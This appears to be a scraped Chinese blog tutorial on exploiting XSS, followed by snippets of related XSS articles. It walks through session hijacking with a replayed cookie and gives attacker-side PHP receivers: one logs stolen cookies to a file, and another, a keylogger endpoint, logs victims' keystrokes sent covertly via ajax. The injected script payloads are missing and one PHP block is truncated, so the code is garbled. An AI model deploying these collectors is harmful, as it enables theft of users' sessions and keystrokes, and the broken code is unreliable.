原理
網頁被植入網頁被植入xss指令碼,普通使用者訪問此網頁時,會自動將使用者本地的cookie快取傳送到指定遠端伺服器
利用
(1)首先登陸乙個頁面,抓包獲取cookie
(2)複製此頁面裡任一選項的url,重啟瀏覽器後直接訪問此url,抓包修改cookie為上面獲取的登陸成功後的cookie
(3)頁面登陸成功,無需密碼
(1)在我們自己的遠端伺服器建立乙個接收cookie的檔案1.php,1.php接受cookie後,將cookie寫入到1.txt儲存
**
<?php $file=fopen("1.txt","a"); if($_get['cookie']) ?>
(2)構造url,使開啟此url的使用者傳送本地cookie給遠端伺服器
(2.1)直接將**拼接到url,將cookie值改為獲取本地cookie,並執行
**:
效果:開啟此url的使用者跳轉到如下介面,並將本地cookie傳送到遠端伺服器,寫入遠端伺服器的1.txt中
(2.2)直接拼接url訪問時會跳轉頁面,可將**寫入乙個標籤裡在再拼接到url
(1)在我們自己的遠端伺服器建立乙個接收使用者按鍵記錄的檔案keylog.php,keylog.php接收鍵盤記錄後,將鍵盤記錄寫入到keylog.txt儲存
**:
<?php
header("access-control-allow-credentials: true");
header("access-control-allow-origin: 192.168.0.106");
header("access-control-request-methods:get, post, put, delete, options");
header('access-control-allow-headers:x-requested-with,content-type,test-token,test-sessid');
$file=fopen("keylog.txt","a");
$_request['keylog'];
$key=$_request['keylog'];
fputs($file,$key);
?>
(2)構造url,使開啟此url的使用者傳送所有的鍵盤記錄給我們的遠端伺服器(通過ajax,隱蔽)
**:
效果:
XSS漏洞分析
網頁 客戶端 傳送請求時隱藏可自動執行的指令碼,從而使指令碼跨站執行 cross site scripeting 達到攻擊目的。由於縮寫和css衝突,故使用xss。伺服器介面 http ip port test?name aaa hobby bbb伺服器大致處理過程 string param1 re...
XSS漏洞筆記
0x01xss跨站指令碼攻擊簡介 xss漏洞是攻擊者在web頁面插入惡意的script 當使用者瀏覽該頁面時,嵌入其中web裡面的script 會被執行,從而達到惡意攻擊使用者的特殊目的。反射型xss只是簡單的把使用者輸入的資料 反射 給瀏覽器.也就是說需要誘使使用者 點選 乙個惡意鏈結,才能攻擊成...
XSS漏洞演示
1 儲存型xss 簡介 注入的惡意指令碼永久儲存在 web 應用程式的資料庫伺服器中,因此這種攻擊不需要對使用者執行任何網路釣魚技術。過程 1 構造惡意指令碼,寫入資料庫 2 客戶訪問 返回惡意資料 遇到問題 不能解析admin資料夾裡面的html檔案,沒有找到解決辦法,於是將html字尾改成了ph...